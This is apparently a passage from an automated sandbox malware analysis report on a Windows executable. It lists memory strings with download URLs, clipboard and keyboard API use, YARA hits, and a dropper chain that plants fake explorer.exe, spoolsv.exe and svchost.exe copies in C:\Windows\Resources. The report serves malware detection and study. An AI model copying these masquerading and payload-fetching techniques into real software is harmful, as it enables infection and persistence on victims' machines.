http://codecmd02.googlecode.com/files/tjcm.gifc-56906d4cb1da
                      Source: explorer.exe, 00000002.00000003.2901360241.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2538361591.0000000000935000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2870048738.0000000000935000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2754525195.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2775310270.0000000000937000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2395658189.000000000094D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2395658189.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2666563377.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2919375874.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gif
                      Source: explorer.exe, 00000002.00000003.2802016823.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2901360241.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/files/tjcm.gifCQsSqgrTCdiQRtVodBqIGNTWqcZQdcl
                      Source: explorer.exe, 00000002.00000003.2802016823.0000000000936000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2901360241.0000000000936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://codecmd03.googlecode.com/filesxeOqExOXCQsSqgrTCdiQRtVodBqIGNTWqcZQdcl
                      Source: file.exe, 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmp, spoolsv.exe, 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000005.00000002.2226170375.0000000000539000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000B.00000002.2356728288.0000000000539000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 0000000E.00000002.2431975556.0000000000539000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428A7E OpenClipboard,0_2_00428A7E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428B36 SetClipboardData,0_2_00428B36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428B36 SetClipboardData,0_2_00428B36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428B36 SetClipboardData,0_2_00428B36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428B36 SetClipboardData,0_2_00428B36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00428B36 SetClipboardData,3_2_00428B36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00428B36 SetClipboardData,3_2_00428B36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00428B36 SetClipboardData,3_2_00428B36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00428B36 SetClipboardData,3_2_00428B36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428806 GetClipboardData,0_2_00428806
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428876 GetKeyboardState,0_2_00428876
                      Source: Yara matchFile source: 14.3.svchost.exe.30384a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.spoolsv.exe.2dd84a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.2eb84a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.explorer.exe.2da84a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.421000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.32384a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.spoolsv.exe.2ce0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.spoolsv.exe.421000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.spoolsv.exe.421000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.svchost.exe.421000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.2dc0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.svchost.exe.3140000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.spoolsv.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.explorer.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.explorer.exe.2c70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.3.explorer.exe.2d684a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.spoolsv.exe.30b84a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.explorer.exe.421000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.3.svchost.exe.2f40000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.2356728288.0000000000539000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.2401893281.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2115854593.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2145790917.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.2330249640.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2180546005.0000000002CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2226170375.0000000000539000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2431975556.0000000000539000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.2164302357.0000000003140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.2129489669.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 2948, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6120, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 3608, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1432, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 3968, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2820, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6864, type: MEMORYSTR

                      System Summary

                      barindex
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: explorer.exe.0.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: spoolsv.exe.2.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: svchost.exe.3.drStatic PE information: section name:
                      Source: C:\Windows\Resources\svchost.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004286D6 NtdllDefWindowProc_A,0_2_004286D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004286D6 NtdllDefWindowProc_A,0_2_004286D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004286D6 NtdllDefWindowProc_A,0_2_004286D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004286D6 NtdllDefWindowProc_A,0_2_004286D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004286D6 NtdllDefWindowProc_A,3_2_004286D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004286D6 NtdllDefWindowProc_A,3_2_004286D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004286D6 NtdllDefWindowProc_A,3_2_004286D6
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004286D6 NtdllDefWindowProc_A,3_2_004286D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427EEE: DeviceIoControl,0_2_00427EEE
                      Source: C:\Users\user\Desktop\file.exeFile created: c:\windows\resources\themes\explorer.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: c:\windows\resources\themes\explorer.exeJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: c:\windows\resources\spoolsv.exeJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeFile created: c:\windows\resources\spoolsv.exeJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeFile created: c:\windows\resources\svchost.exeJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeFile created: c:\windows\resources\svchost.exeJump to behavior
                      Source: C:\Windows\Resources\svchost.exeFile created: C:\Windows\Resources\Themes\tjcm.cmnJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile deleted: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412C100_2_00412C10
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00412C103_2_00412C10
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 004254D0 appears 36 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 004254AC appears 122 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00427B54 appears 51 times
                      Source: C:\Windows\Resources\spoolsv.exeCode function: String function: 004254D0 appears 36 times
                      Source: C:\Windows\Resources\spoolsv.exeCode function: String function: 004254AC appears 122 times
                      Source: C:\Windows\Resources\spoolsv.exeCode function: String function: 00427B54 appears 51 times
                      Source: file.exe, 00000000.00000000.2115207406.000000000041F000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs file.exe
                      Source: file.exeBinary or memory string: OriginalFilenameTJprojMain.exe<?xml version="1.0" encoding="UTF-8" standalone="yes"?> vs file.exe
                      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: file.exe, 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmp, spoolsv.exe, 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000005.00000002.2223457004.000000000041B000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000B.00000002.2356069803.000000000041B000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 0000000E.00000002.2431859508.000000000041B000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: @mlH@*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp @mP
                      Source: file.exe, file.exe, 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, spoolsv.exe, spoolsv.exe, 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, spoolsv.exe, 00000005.00000002.2223457004.0000000000401000.00000040.00000001.01000000.00000008.sdmp, explorer.exe, 0000000B.00000002.2356069803.0000000000401000.00000040.00000001.01000000.00000007.sdmp, svchost.exe, 0000000E.00000002.2431859508.0000000000401000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: A*\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                      Source: file.exe, spoolsv.exeBinary or memory string: *\AF:\RFD\xNewCode\xNewPro\xT\trjFN\Project1.vbp
                      Source: classification engineClassification label: mal100.spre.evad.winEXE@17/10@8/6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AFBA GetDiskFreeSpaceA,0_2_0042AFBA
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410180 CreateToolhelp32Snapshot,Process32First,K32GetModuleFileNameExA,Process32Next,0_2_00410180
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042820E LoadResource,0_2_0042820E
                      Source: C:\Windows\Resources\svchost.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\~DFD0AF9FB89F40A3C3.TMPJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                      Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Windows\Resources\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: file.exeReversingLabs: Detection: 71%
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exe
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SE
                      Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exe
                      Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PR
                      Source: unknownProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                      Source: unknownProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6016 322 0000022C4F0331F0
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Resources\Themes\explorer.exe c:\windows\resources\themes\explorer.exeJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe SEJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeProcess created: C:\Windows\Resources\svchost.exe c:\windows\resources\svchost.exeJump to behavior
                      Source: C:\Windows\Resources\svchost.exeProcess created: C:\Windows\Resources\spoolsv.exe c:\windows\resources\spoolsv.exe PRJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" ROJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6016 322 0000022C4F0331F0Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" ROJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\spoolsv.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: wmsgapi.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: msctfmonitor.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: msutb.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\consent.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Resources\svchost.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\Resources\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B196B287-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32Jump to behavior
